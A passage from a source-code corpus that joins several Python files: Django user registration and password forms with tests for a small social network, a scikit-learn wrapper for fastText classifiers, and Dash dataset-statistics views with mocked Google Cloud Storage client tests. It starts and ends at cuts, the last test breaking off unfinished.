self.fields['password'].label = ''
self.fields['password_again'].widget.attrs.update({
'placeholder': 'Repeat password', 'class': 'form-control mb-3'
})
self.fields['password_again'].help_text = ''
self.fields['password_again'].label = ''
# this code is for descendants
# remove unnecessary fields
unnecessary = set(self.fields.keys()) - set(self.Meta.fields)
for field in unnecessary:
self.fields.pop(field)
def clean(self):
cleaned_data = super().clean()
validation_errors = list()
# Calculate form size
# use latest id as reference
try:
form_size = len(str(User.objects.latest('id').id))
except ObjectDoesNotExist:
form_size = 1
        # if we already had errors, then we will skip these fields
for field_name in set(self.changed_data) - set(self.errors):
if field_name in ['password_again']:
continue
if field_name == 'avatar':
form_size += cleaned_data['avatar'].size
continue
form_size += len(str(cleaned_data[field_name]))
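        # Worked example (hypothetical numbers): with the latest user id being
        # 1024, a 3000-byte avatar, a 12-character username and a 20-character
        # email, form_size = 4 + 3000 + 12 + 20 = 3036 bytes, which must not
        # exceed MAX_PAGE_SIZE for the check below to pass.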
if form_size > MAX_PAGE_SIZE:
validation_errors.append(forms.ValidationError(_('You have only 640Kb for all purposes!'), code='oversize'))
# Clean password
cleaned_data, password_clean_errors = self._clean_password(cleaned_data)
validation_errors += password_clean_errors
if validation_errors:
raise forms.ValidationError(validation_errors)
new_pass = cleaned_data['password']
if len(new_pass) > 0:
            cleaned_data['password'] = make_password(new_pass)
return cleaned_data
class UserUpdateForm(UserForm):
firstname = forms.CharField(widget=forms.TextInput)
lastname = forms.CharField(widget=forms.TextInput)
patronymic = forms.CharField(widget=forms.TextInput)
birth_date = forms.DateField(widget=forms.DateInput, input_formats=[DATE_FORMAT])
class Meta(UserForm.Meta):
fields = ('firstname', 'lastname', 'patronymic', 'birth_date', 'password', 'password_again', 'avatar')
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
for key in self.fields:
self.fields[key].required = False
self.fields['firstname'].widget.attrs.update({
'placeholder': 'First Name', 'class': 'form-control mb-3'
})
self.fields['firstname'].help_text = ''
self.fields['firstname'].label = ''
self.fields['lastname'].widget.attrs.update({
'placeholder': 'Last Name', 'class': 'form-control mb-3'
})
self.fields['lastname'].help_text = ''
self.fields['lastname'].label = ''
self.fields['patronymic'].widget.attrs.update({
'placeholder': 'Patronymic', 'class': 'form-control mb-3'
})
self.fields['patronymic'].help_text = ''
self.fields['patronymic'].label = ''
self.fields['birth_date'].widget.attrs.update({
'placeholder': 'Birth Date', 'class': 'form-control mb-3'
})
self.fields['birth_date'].widget.format = DATE_FORMAT
self.fields['birth_date'].help_text = ''
self.fields['birth_date'].label = ''
self.fields['password'].widget.attrs.update({
'placeholder': 'New password'})
self.fields['password_again'].widget.attrs.update({
'placeholder': 'Repeat new password'})
def clean(self):
cleaned_data = super().clean()
delta = 0
# if we have empty password field then skip updating this field
if 'password' in self.changed_data:
password = cleaned_data['password']
if len(password) == 0:
index = self.changed_data.index('password')
self.changed_data.pop(index)
cleaned_data.pop('password')
# get approximate size of user fields
original_sizes = self.instance.get_fields_size()
        # check delta for all fields except password_again (which does not exist in the DB)
for field_name in self.changed_data:
if field_name in ['password_again']:
continue
updated_value = cleaned_data[field_name]
if not updated_value:
updated_len = 0
elif field_name == 'avatar':
updated_len = updated_value.size
else:
updated_len = len(str(updated_value))
original_len = original_sizes[field_name]
delta += updated_len - original_len
if self.instance.get_size() + delta > MAX_PAGE_SIZE:
raise forms.ValidationError(_(ERR_EXCEED_LIMIT), code='oversize')
return cleaned_data
class UserRequestPasswordResetForm(PasswordResetForm):
email = forms.EmailField(widget=forms.EmailInput, max_length=256)
class Meta:
model = User
fields = ('email',)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields['email'].widget.attrs.update({
'placeholder': 'Email', 'class': 'form-control mb-3'
})
self.fields['email'].help_text = ''
self.fields['email'].label = ''
class UserPasswordUpdateForm(UserForm):
password = forms.CharField(widget=forms.PasswordInput)
password_again = forms.CharField(widget=forms.PasswordInput)
class Meta(UserForm.Meta):
fields = ('password', 'password_again')
class UserPasswordResetConfirmForm(CleanPasswordMixin, forms.Form):
password = forms.CharField(widget=forms.PasswordInput)
password_again = forms.CharField(widget=forms.PasswordInput)
def __init__(self, user, *args, **kwargs):
self.user = user
super().__init__(*args, **kwargs)
def clean(self):
cleaned_data = super().clean()
cleaned_data, password_clean_errors = self._clean_password(cleaned_data)
if password_clean_errors:
raise forms.ValidationError(password_clean_errors)
return cleaned_data
def save(self, commit=True):
password = self.cleaned_data["password"]
self.user.set_password(password)
if commit:
self.user.save()
return self.user
```
#### File: user_profile/tests/test_models.py
```python
from uuid import uuid1
from django.core.cache import cache
from django.test import TestCase
from Net640.apps.user_profile.models import User
from Net640.apps.user_profile.models import RELATIONSHIP_FRIENDS, RELATIONSHIP_REQUEST_HAS_SENT
from Net640.apps.user_profile.models import RELATIONSHIP_WAITING_FOR_ACCEPT, NO_RELATIONSHIP
class TestUserPermission(TestCase):
def setUp(self):
random_name = str(uuid1())
self.user1 = User(username=random_name, email=random_name + '@m.ru')
self.user1.set_password('<PASSWORD>')
self.user1.save()
random_name = str(uuid1())
self.user2 = User(username=random_name, email=random_name + '@m.ru')
self.user2.set_password('<PASSWORD>')
self.user2.save()
def test_send_request_for_relationship(self):
self.user1.accept(self.user2)
self.assertEqual(self.user1.check_relationship(self.user2), RELATIONSHIP_REQUEST_HAS_SENT)
self.assertEqual(self.user2.check_relationship(self.user1), RELATIONSHIP_WAITING_FOR_ACCEPT)
def test_cancel_own_send_request_for_relationship(self):
self.user1.accept(self.user2)
self.assertEqual(self.user1.check_relationship(self.user2), RELATIONSHIP_REQUEST_HAS_SENT)
self.assertEqual(self.user2.check_relationship(self.user1), RELATIONSHIP_WAITING_FOR_ACCEPT)
self.user1.cancel(self.user2)
self.assertEqual(self.user1.check_relationship(self.user2), NO_RELATIONSHIP)
self.assertEqual(self.user2.check_relationship(self.user1), NO_RELATIONSHIP)
def test_cancel_foreign_send_request_for_relationship(self):
self.user1.accept(self.user2)
self.assertEqual(self.user1.check_relationship(self.user2), RELATIONSHIP_REQUEST_HAS_SENT)
self.assertEqual(self.user2.check_relationship(self.user1), RELATIONSHIP_WAITING_FOR_ACCEPT)
self.user2.cancel(self.user1)
self.assertEqual(self.user1.check_relationship(self.user2), NO_RELATIONSHIP)
self.assertEqual(self.user2.check_relationship(self.user1), NO_RELATIONSHIP)
def test_add_to_friends(self):
self.user1.accept(self.user2)
self.user2.accept(self.user1)
self.assertEqual(self.user1.check_relationship(self.user2), RELATIONSHIP_FRIENDS)
self.assertEqual(self.user2.check_relationship(self.user1), RELATIONSHIP_FRIENDS)
self.assertEqual(self.user1.get_friends()[0].username, self.user2.username)
self.assertEqual(self.user2.get_friends()[0].username, self.user1.username)
def test_remove_from_friends(self):
self.user1.accept(self.user2)
self.user2.accept(self.user1)
self.user1.cancel(self.user2)
self.assertEqual(self.user1.check_relationship(self.user2), NO_RELATIONSHIP)
self.assertEqual(self.user2.check_relationship(self.user1), NO_RELATIONSHIP)
class TestCaching(TestCase):
def setUp(self):
random_name = str(uuid1())
self.user1 = User(username=random_name, email=random_name + '@<EMAIL>')
self.user1.set_password('<PASSWORD>')
self.user1.save()
def test_get_size_caching_is_working(self):
fake_size = 777
cache.delete(self.user1.id)
size = self.user1.get_size()
cache.set(self.user1.id, fake_size)
self.assertNotEqual(size, fake_size)
self.assertEqual(fake_size, self.user1.get_size())
```
#### File: Net640/testing/runners.py
```python
from django.test.runner import DiscoverRunner
from django.test import TransactionTestCase, TestCase
from unittest.suite import TestSuite
class TransactionTestRunner(DiscoverRunner):
"""
    To run tests with this runner, execute the following command:
python manage.py test --testrunner "Net640.testing.runners.TransactionTestRunner"
"""
def build_suite(self, *args, **kwargs):
suite = super().build_suite(*args, **kwargs)
tests = [t for t in suite._tests if self.is_transactiontest(t)]
return TestSuite(tests=tests)
def is_transactiontest(self, test):
return hasattr(test, "TRANSACTION_TEST_CASE")
class UnitTestRunner(DiscoverRunner):
"""
    To run tests with this runner, execute the following command:
python manage.py test --testrunner "Net640.testing.runners.UnitTestRunner"
"""
def build_suite(self, *args, **kwargs):
suite = super().build_suite(*args, **kwargs)
tests = [t for t in suite._tests if self.is_unittest(t)]
return TestSuite(tests=tests)
def is_unittest(self, test):
return not hasattr(test, "TRANSACTION_TEST_CASE")
``` |
{
"source": "86mm86/skift",
"score": 3
} |
#### File: skift/skift/core.py
```python
import os
import abc
import numpy as np
from fastText import train_supervised
from sklearn.base import BaseEstimator, ClassifierMixin
from sklearn.utils.multiclass import unique_labels
from sklearn.exceptions import NotFittedError
from .util import (
temp_dataset_fpath,
dump_xy_to_fasttext_format,
python_fasttext_model_to_bytes,
bytes_to_python_fasttext_model,
)
class FtClassifierABC(BaseEstimator, ClassifierMixin, metaclass=abc.ABCMeta):
"""An abstact base class for sklearn classifier adapters for fasttext.
Parameters
----------
**kwargs
Keyword arguments will be redirected to fasttext.train_supervised.
"""
def __init__(self, **kwargs):
self.kwargs = kwargs
self.kwargs.pop('input', None) # remove the 'input' arg, if given
self.model = None
def __getstate__(self):
if self.model is not None:
model_pickle = python_fasttext_model_to_bytes(self.model)
pickle_dict = self.__dict__.copy()
pickle_dict['model'] = model_pickle
return pickle_dict
return self.__dict__
def __setstate__(self, dicti):
for key in dicti:
if key == 'model':
unpic_model = bytes_to_python_fasttext_model(dicti[key])
setattr(self, 'model', unpic_model)
else:
setattr(self, key, dicti[key])
def get_params(self, deep=True):
"""Get parameters for this estimator.
Parameters
----------
deep : boolean, optional
If True, will return the parameters for this estimator and
contained subobjects that are estimators.
Returns
-------
params : mapping of string to any
Parameter names mapped to their values.
"""
# re-implementation that will preserve ft kwargs
return self.kwargs
ALLOWED_DTYPES_ = ['<U26', object]
@staticmethod
def _validate_x(X):
try:
if len(X.shape) != 2:
raise ValueError(
"FastTextClassifier methods must get a two-dimensional "
"numpy array (or castable) as the X parameter.")
return X
except AttributeError:
return FtClassifierABC._validate_x(np.array(X))
@staticmethod
def _validate_y(y):
try:
if len(y.shape) != 1:
raise ValueError(
"FastTextClassifier methods must get a one-dimensional "
"numpy array as the y parameter.")
return np.array(y)
except AttributeError:
return FtClassifierABC._validate_y(np.array(y))
@abc.abstractmethod
def _input_col(self, X):
pass # pragma: no cover
def fit(self, X, y):
"""Fits the classifier
Parameters
----------
X : array-like, shape = [n_samples, n_features]
The training input samples.
y : array-like, shape = [n_samples]
The target values. An array of int.
Returns
-------
self : object
Returns self.
"""
# Check that X and y have correct shape
self._validate_x(X)
y = self._validate_y(y)
# Store the classes seen during fit
self.classes_ = unique_labels(y)
self.num_classes_ = len(self.classes_)
self.class_labels_ = [
'__label__{}'.format(lbl) for lbl in self.classes_]
# Dump training set to a fasttext-compatible file
temp_trainset_fpath = temp_dataset_fpath()
input_col = self._input_col(X)
dump_xy_to_fasttext_format(input_col, y, temp_trainset_fpath)
# train
self.model = train_supervised(
input=temp_trainset_fpath, **self.kwargs)
# Return the classifier
try:
os.remove(temp_trainset_fpath)
except FileNotFoundError: # pragma: no cover
pass
return self
@staticmethod
def _clean_label(ft_label):
return int(ft_label[9:])
def _predict(self, X, k=1):
# Ensure that fit had been called
if self.model is None:
raise NotFittedError("This {} instance is not fitted yet.".format(
self.__class__.__name__))
        # Input validation
self._validate_x(X)
input_col = self._input_col(X)
return [self.model.predict(text, k) for text in input_col]
def predict(self, X):
"""Predict labels.
Parameters
----------
X : array-like of shape = [n_samples, n_features]
The input samples.
Returns
-------
y : array of int of shape = [n_samples]
            Predicted labels for the given input samples.
"""
return np.array([
self._clean_label(res[0][0])
for res in self._predict(X)
], dtype=np.float_)
def _format_probas(self, result):
lbl_prob_pairs = zip(result[0], result[1])
sorted_lbl_prob_pairs = sorted(
lbl_prob_pairs, key=lambda x: self.class_labels_.index(x[0]))
return [x[1] for x in sorted_lbl_prob_pairs]
def predict_proba(self, X):
"""Predict class probabilities for X.
Parameters
----------
X : array-like of shape = [n_samples, n_features]
The input samples.
Returns
-------
p : array of shape = [n_samples, n_classes]
The class probabilities of the input samples. The order of the
classes corresponds to that in the attribute classes_.
"""
return np.array([
self._format_probas(res)
for res in self._predict(X, self.num_classes_)
], dtype=np.float_)
class FirstColFtClassifier(FtClassifierABC):
"""An sklearn classifier adapter for fasttext using the first column.
Parameters
----------
**kwargs
Additional keyword arguments will be redirected to
fasttext.train_supervised.
"""
def _input_col(self, X):
return np.array(X)[:, 0]
class IdxBasedFtClassifier(FtClassifierABC):
"""An sklearn classifier adapter for fasttext that takes input by index.
Parameters
----------
input_ix : int
The index of the text input column for fasttext.
**kwargs
Additional keyword arguments will be redirected to
fasttext.train_supervised.
"""
def __init__(self, input_ix, **kwargs):
super().__init__(**kwargs)
self.input_ix = input_ix
def _input_col(self, X):
return np.array(X)[:, self.input_ix]
def get_params(self, deep=True):
"""Get parameters for this estimator.
Parameters
----------
deep : boolean, optional
If True, will return the parameters for this estimator and
contained subobjects that are estimators.
Returns
-------
params : mapping of string to any
Parameter names mapped to their values.
"""
# re-implementation that will preserve ft kwargs
return {'input_ix': self.input_ix, **self.kwargs}
class FirstObjFtClassifier(FtClassifierABC):
"""An sklearn adapter for fasttext using the first object column as input.
    This classifier assumes the X parameter for fit, predict and predict_proba
is in all cases a pandas.DataFrame object.
Parameters
----------
**kwargs
Keyword arguments will be redirected to fasttext.train_supervised.
"""
def _input_col(self, X):
input_col_name = None
for col_name, dtype in X.dtypes.items():
if dtype == object:
input_col_name = col_name
break
if input_col_name is not None:
return X[input_col_name]
raise ValueError("No object dtype column in input param X.")
class ColLblBasedFtClassifier(FtClassifierABC):
"""An sklearn adapter for fasttext taking input by column label.
    This classifier assumes the X parameter for fit, predict and predict_proba
is in all cases a pandas.DataFrame object.
Parameters
----------
input_col_lbl : str
The label of the text input column for fasttext.
**kwargs
Keyword arguments will be redirected to fasttext.train_supervised.
"""
def __init__(self, input_col_lbl, **kwargs):
super().__init__(**kwargs)
self.input_col_lbl = input_col_lbl
def _input_col(self, X):
return X[self.input_col_lbl]
def get_params(self, deep=True):
"""Get parameters for this estimator.
Parameters
----------
deep : boolean, optional
If True, will return the parameters for this estimator and
contained subobjects that are estimators.
Returns
-------
params : mapping of string to any
Parameter names mapped to their values.
"""
# re-implementation that will preserve ft kwargs
return {'input_col_lbl': self.input_col_lbl, **self.kwargs}
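# Usage sketch (added for illustration, not part of the original skift module).
# Example data and hyperparameters are hypothetical; it requires the fastText
# Python package used by the classes above.
if __name__ == '__main__':
    train_x = [['this movie was great'], ['terrible acting'],
               ['loved every minute'], ['an awful film']]
    train_y = [1, 0, 1, 0]
    clf = FirstColFtClassifier(lr=0.5, epoch=10)  # kwargs go to train_supervised
    clf.fit(train_x, train_y)
    print(clf.predict([['what a great film']]))        # predicted labels
    print(clf.predict_proba([['what a great film']]))  # per-class probabilities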
``` |
{
"source": "86sanj/datasetinsights",
"score": 2
} |
#### File: datasetinsights/datasetinsights/__main__.py
```python
import logging
import click
from datasetinsights.commands import Entrypoint
from datasetinsights.constants import CONTEXT_SETTINGS
logging.basicConfig(
level=logging.INFO,
format=(
"%(levelname)s | %(asctime)s | %(name)s | %(threadName)s | "
"%(message)s"
),
datefmt="%Y-%m-%d %H:%M:%S",
)
logger = logging.getLogger(__name__)
@click.command(
cls=Entrypoint, help="Dataset Insights.", context_settings=CONTEXT_SETTINGS,
)
@click.option(
"-v",
"--verbose",
is_flag=True,
default=False,
help="Enables verbose mode.",
)
def entrypoint(verbose):
if verbose:
root_logger = logging.getLogger()
root_logger.setLevel(logging.DEBUG)
if __name__ == "__main__":
entrypoint()
```
#### File: stats/visualization/app.py
```python
import os
import dash
def _init_app():
""" Intializes the dash app."""
this_dir = os.path.dirname(os.path.abspath(__file__))
css_file = os.path.join(this_dir, "stylesheet.css")
app = dash.Dash(
__name__,
external_stylesheets=[css_file],
suppress_callback_exceptions=True,
)
return app
_app = _init_app()
def get_app():
return _app
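# Usage sketch (added for illustration, not part of the original module): the
# shared app instance can be served directly for local debugging.
if __name__ == '__main__':
    get_app().run_server(debug=True)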
```
#### File: stats/visualization/overview.py
```python
import json
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
import datasetinsights.stats.statistics as stat
import datasetinsights.stats.visualization.constants as constants
from .app import get_app
from .plots import bar_plot, histogram_plot
app = get_app()
def generate_total_counts_figure(max_samples, roinfo):
""" Method for generating total object count bar plot using ploty.
Args:
max_samples(int): maximum number of samples that will be included
in the plot.
roinfo(datasetinsights.data.datasets.statistics.RenderedObjectInfo):
Rendered Object Info in Captures.
Returns:
plotly.graph_objects.Figure: chart to display total object count
"""
total_counts_fig = bar_plot(
roinfo.total_counts(),
x="label_id",
y="count",
x_title="Label Id",
y_title="Count",
title="Total Object Count in Dataset",
hover_name="label_name",
)
return total_counts_fig
def generate_per_capture_count_figure(max_samples, roinfo):
""" Method for generating object count per capture histogram using ploty.
Args:
max_samples(int): maximum number of samples that will be included
in the plot.
roinfo(datasetinsights.data.datasets.statistics.RenderedObjectInfo):
Rendered Object Info in Captures.
Returns:
plotly.graph_objects.Figure: chart to display object counts per capture
"""
per_capture_count_fig = histogram_plot(
roinfo.per_capture_counts(),
x="count",
x_title="Object Counts Per Capture",
y_title="Frequency",
title="Distribution of Object Counts Per Capture: Overall",
max_samples=max_samples,
)
return per_capture_count_fig
def generate_pixels_visible_per_object_figure(max_samples, roinfo):
""" Method for generating pixels visible per object histogram using ploty.
Args:
max_samples(int): maximum number of samples that will be included
in the plot.
roinfo(datasetinsights.data.datasets.statistics.RenderedObjectInfo):
Rendered Object Info in Captures.
Returns:
plotly.graph_objects.Figure: chart to display visible pixels per object
"""
pixels_visible_per_object_fig = histogram_plot(
roinfo.raw_table,
x="visible_pixels",
x_title="Visible Pixels Per Object",
y_title="Frequency",
title="Distribution of Visible Pixels Per Object: Overall",
max_samples=max_samples,
)
return pixels_visible_per_object_fig
def html_overview(data_root):
""" Method for displaying overview statistics.
Args:
data_root(str): path to the dataset.
Returns:
html layout: displays graphs for overview statistics.
"""
roinfo = stat.RenderedObjectInfo(
data_root=data_root, def_id=constants.RENDERED_OBJECT_INFO_DEFINITION_ID
)
label_names = roinfo.total_counts()["label_name"].unique()
total_counts_fig = generate_total_counts_figure(
constants.MAX_SAMPLES, roinfo
)
per_capture_count_fig = generate_per_capture_count_figure(
constants.MAX_SAMPLES, roinfo
)
pixels_visible_per_object_fig = generate_pixels_visible_per_object_figure(
constants.MAX_SAMPLES, roinfo
)
overview_layout = html.Div(
[
html.Div(id="overview"),
dcc.Markdown(
""" # Total Object Count """, style={"text-align": "center"}
),
dcc.Graph(id="total_count", figure=total_counts_fig,),
html.Div(
[
dcc.Markdown(
""" # Object Count Distribution """,
style={"text-align": "center"},
),
dcc.Dropdown(
id="object_count_filter",
options=[{"label": i, "value": i} for i in label_names],
value=label_names[0],
),
],
),
html.Div(
[
dcc.Graph(
id="per_object_count", figure=per_capture_count_fig,
),
dcc.Graph(id="per_object_count_filter_graph",),
],
style={"columnCount": 2},
),
html.Div(
[
dcc.Markdown(
"""# Visible Pixels Distribution """,
style={"text-align": "center"},
),
dcc.Dropdown(
id="pixels_visible_filter",
options=[{"label": i, "value": i} for i in label_names],
value=label_names[0],
),
],
),
html.Div(
[
dcc.Graph(
id="pixels_visible_per_object",
figure=pixels_visible_per_object_fig,
),
dcc.Graph(id="pixels_visible_filter_graph",),
],
style={"columnCount": 2},
),
],
)
return overview_layout
@app.callback(
Output("pixels_visible_filter_graph", "figure"),
[
Input("pixels_visible_filter", "value"),
Input("data_root_value", "children"),
],
)
def update_visible_pixels_figure(label_value, json_data_root):
""" Method for generating pixels visible histogram for selected object.
Args:
label_value (str): value selected by user using drop-down
Returns:
plotly.graph_objects.Figure: displays visible pixels distribution.
"""
roinfo = stat.RenderedObjectInfo(
data_root=json.loads(json_data_root),
def_id=constants.RENDERED_OBJECT_INFO_DEFINITION_ID,
)
filtered_roinfo = roinfo.raw_table[
roinfo.raw_table["label_name"] == label_value
][["visible_pixels"]]
filtered_figure = histogram_plot(
filtered_roinfo,
x="visible_pixels",
x_title="Visible Pixels For " + str(label_value),
y_title="Frequency",
title="Distribution of Visible Pixels For " + str(label_value),
max_samples=constants.MAX_SAMPLES,
)
return filtered_figure
@app.callback(
Output("per_object_count_filter_graph", "figure"),
[
Input("object_count_filter", "value"),
Input("data_root_value", "children"),
],
)
def update_object_counts_capture_figure(label_value, json_data_root):
""" Method for generating object count per capture histogram for selected
object.
Args:
label_value (str): value selected by user using drop-down
Returns:
plotly.graph_objects.Figure: displays object count distribution.
"""
roinfo = stat.RenderedObjectInfo(
data_root=json.loads(json_data_root),
def_id=constants.RENDERED_OBJECT_INFO_DEFINITION_ID,
)
filtered_object_count = roinfo.raw_table[
roinfo.raw_table["label_name"] == label_value
]
filtered_object_count = (
filtered_object_count.groupby(["capture_id"])
.size()
.to_frame(name="count")
.reset_index()
)
filtered_figure = histogram_plot(
filtered_object_count,
x="count",
x_title="Object Counts Per Capture For " + str(label_value),
y_title="Frequency",
title="Distribution of Object Counts Per Capture For "
+ str(label_value),
max_samples=constants.MAX_SAMPLES,
)
return filtered_figure
```
#### File: datasetinsights/tests/test_dashboard.py
```python
import pandas as pd
from datasetinsights.stats.visualization.object_detection import ScaleFactor
def test_generate_scale_data():
captures = [
{
"id": "4521949a- 2a71-4c03-beb0-4f6362676639",
"sensor": {"scale": 1.0},
},
{
"id": "4b35a47a-3f63-4af3-b0e8-e68cb384ad75",
"sensor": {"scale": 2.0},
},
]
captures = pd.DataFrame(captures)
actual_scale = ScaleFactor.generate_scale_data(captures)
expected_scale = pd.DataFrame([1.0, 2.0], columns=["scale"])
pd.testing.assert_frame_equal(expected_scale, actual_scale)
```
#### File: datasetinsights/tests/test_gcs.py
```python
from pathlib import Path
from unittest.mock import MagicMock, patch
import pytest
from datasetinsights.io.downloader import GCSDatasetDownloader
from datasetinsights.io.exceptions import ChecksumError
from datasetinsights.io.gcs import GCSClient
bucket_name = "fake_bucket"
local_path = "path/to/local"
md5_hash = "abc=="
md5_hash_hex = "12345"
file_name = "/data.zip"
base_key = "path/to/object"
base_url = "gs://fake_bucket/path/to/object"
@patch("datasetinsights.io.gcs.GCSClient._upload_file")
@patch("datasetinsights.io.gcs.isdir")
def test_gcs_client_upload_file_bucket_key(mock_isdir, mock_upload_file):
localfile = local_path + file_name
mocked_gcs_client = MagicMock()
mock_isdir.return_value = False
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
client = GCSClient()
client.upload(local_path=localfile, bucket=bucket_name, key=base_key)
mock_upload_file.assert_called_with(
bucket=mocked_gcs_client.get_bucket(),
key=base_key,
local_path=localfile,
)
@patch("datasetinsights.io.gcs.GCSClient._upload_file")
@patch("datasetinsights.io.gcs.isdir")
def test_gcs_client_upload_file_url(mock_isdir, mock_upload_file):
localfile = local_path + file_name
mocked_gcs_client = MagicMock()
mock_isdir.return_value = False
url = base_url + file_name
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
client = GCSClient()
client.upload(local_path=localfile, url=url)
mock_upload_file.assert_called_with(
bucket=mocked_gcs_client.get_bucket(),
key=base_key + file_name,
local_path=localfile,
)
@patch("datasetinsights.io.gcs.GCSClient._upload_folder")
@patch("datasetinsights.io.gcs.isdir")
def test_gcs_client_upload_folder_bucket_key(mock_isdir, mock_upload_folder):
mocked_gcs_client = MagicMock()
mock_isdir.return_value = True
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
client = GCSClient()
client.upload(
local_path=local_path, bucket=bucket_name, key=base_key, pattern="*"
)
mock_upload_folder.assert_called_with(
bucket=mocked_gcs_client.get_bucket(),
key=base_key,
local_path=local_path,
pattern="*",
)
@patch("datasetinsights.io.gcs.GCSClient._upload_folder")
@patch("datasetinsights.io.gcs.isdir")
def test_gcs_client_upload_folder_url(mock_isdir, mock_upload_folder):
mocked_gcs_client = MagicMock()
mock_isdir.return_value = True
url = base_url
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
client = GCSClient()
client.upload(local_path=local_path, url=url, pattern="*")
mock_upload_folder.assert_called_with(
bucket=mocked_gcs_client.get_bucket(),
key=base_key,
local_path=local_path,
pattern="*",
)
@patch("datasetinsights.io.gcs.GCSClient._is_file")
@patch("datasetinsights.io.gcs.GCSClient._download_file")
def test_gcs_client_download_file_bucket_key(mock_download_file, mock_is_file):
mocked_gcs_client = MagicMock()
mock_is_file.return_value = True
object_key = base_key + file_name
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
client = GCSClient()
client.download(
local_path=local_path, bucket=bucket_name, key=object_key
)
mock_download_file.assert_called_with(
mocked_gcs_client.get_bucket(), object_key, local_path
)
@patch("datasetinsights.io.gcs.GCSClient._is_file")
@patch("datasetinsights.io.gcs.GCSClient._download_file")
def test_gcs_client_download_file_url(mock_download_file, mock_is_file):
url = base_url + file_name
mocked_gcs_client = MagicMock()
mock_is_file.return_value = True
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
client = GCSClient()
client.download(local_path=local_path, url=url)
mock_download_file.assert_called_with(
mocked_gcs_client.get_bucket(), base_key + file_name, local_path
)
@patch("datasetinsights.io.gcs.GCSClient._is_file")
@patch("datasetinsights.io.gcs.GCSClient._download_folder")
def test_gcs_client_download_folder_bucket_key(
mock_download_folder, mock_is_file
):
mocked_gcs_client = MagicMock()
mock_is_file.return_value = False
object_key = base_key
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
client = GCSClient()
client.download(
local_path=local_path, bucket=bucket_name, key=object_key
)
mock_download_folder.assert_called_with(
mocked_gcs_client.get_bucket(), object_key, local_path
)
@patch("datasetinsights.io.gcs.GCSClient._is_file")
@patch("datasetinsights.io.gcs.GCSClient._download_folder")
def test_gcs_client_download_folder_url(mock_download_folder, mock_is_file):
mocked_gcs_client = MagicMock()
mock_is_file.return_value = False
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
client = GCSClient()
client.download(local_path=local_path, url=base_url)
mock_download_folder.assert_called_with(
mocked_gcs_client.get_bucket(), base_key, local_path
)
@patch("datasetinsights.io.gcs.GCSClient._download_validate")
def test_download_folder(mock_download_validate):
object_key = "path/to" + file_name
mocked_gcs_client = MagicMock()
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
client = GCSClient()
mocked_blob = MagicMock()
mocked_bucket = MagicMock()
mocked_bucket.list_blobs = MagicMock(return_value=[mocked_blob])
mocked_blob.name = object_key
client._download_folder(mocked_bucket, object_key, local_path)
mock_download_validate.assert_called_with(mocked_blob, local_path)
@patch("datasetinsights.io.gcs.GCSClient._download_validate")
def test_download_file(mock_download_validate):
object_key = base_key + file_name
mocked_gcs_client = MagicMock()
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
client = GCSClient()
mocked_bucket = MagicMock()
mocked_blob = MagicMock()
mocked_bucket.get_blob = MagicMock(return_value=mocked_blob)
mocked_blob.name = object_key
client._download_file(mocked_bucket, object_key, local_path)
mocked_bucket.get_blob.assert_called_with(object_key)
mock_download_validate.assert_called_with(
mocked_blob, local_path + file_name
)
@patch("datasetinsights.io.gcs.GCSClient._download_blob")
@patch("datasetinsights.io.gcs.GCSClient._checksum")
def test_download_validate(mock_checksum, mock_download_blob):
mocked_gcs_client = MagicMock()
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
client = GCSClient()
mocked_blob = MagicMock()
client._download_validate(mocked_blob, local_path)
mock_checksum.assert_called_with(mocked_blob, local_path)
mock_download_blob.assert_called_with(mocked_blob, local_path)
@patch("datasetinsights.io.gcs.isdir")
def test_download_blob(mock_isdir):
mocked_gcs_client = MagicMock()
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
mock_isdir.return_value = True
object_key = base_key + file_name
client = GCSClient()
mocked_blob = MagicMock()
mocked_blob.name = object_key
mocked_download_blob = MagicMock()
mocked_blob.download_to_filename = mocked_download_blob
client._download_blob(mocked_blob, local_path)
mocked_blob.download_to_filename.assert_called_with(local_path)
@patch("datasetinsights.io.gcs.GCSClient._md5_hex")
@patch("datasetinsights.io.gcs.validate_checksum")
def test_checksum(mock_checksum, mock_md5_hex):
local_file_path = local_path + file_name
mocked_gcs_client = MagicMock()
mock_md5_hex.return_value = md5_hash_hex
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
client = GCSClient()
mocked_bucket = MagicMock()
mocked_blob = MagicMock()
mocked_gcs_client.get_bucket = MagicMock(return_value=mocked_bucket)
mocked_bucket.get_blob = MagicMock(return_value=mocked_blob)
mocked_blob.md5_hash = md5_hash
client._checksum(mocked_blob, local_file_path)
mock_checksum.assert_called_with(
local_file_path, md5_hash_hex, algorithm="MD5"
)
@patch("datasetinsights.io.gcs.os.remove")
@patch("datasetinsights.io.gcs.validate_checksum")
def test_checksum_error(mock_checksum, mock_remove):
local_file_path = local_path + file_name
mocked_gcs_client = MagicMock()
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
client = GCSClient()
mocked_bucket = MagicMock()
mocked_blob = MagicMock()
mocked_gcs_client.get_bucket = MagicMock(return_value=mocked_bucket)
mocked_bucket.get_blob = MagicMock(return_value=mocked_blob)
mocked_blob.md5_hash = md5_hash
        client._md5_hex = MagicMock(return_value=md5_hash_hex)
client._checksum(mocked_blob, local_file_path)
mock_checksum.side_effect = ChecksumError
with pytest.raises(ChecksumError):
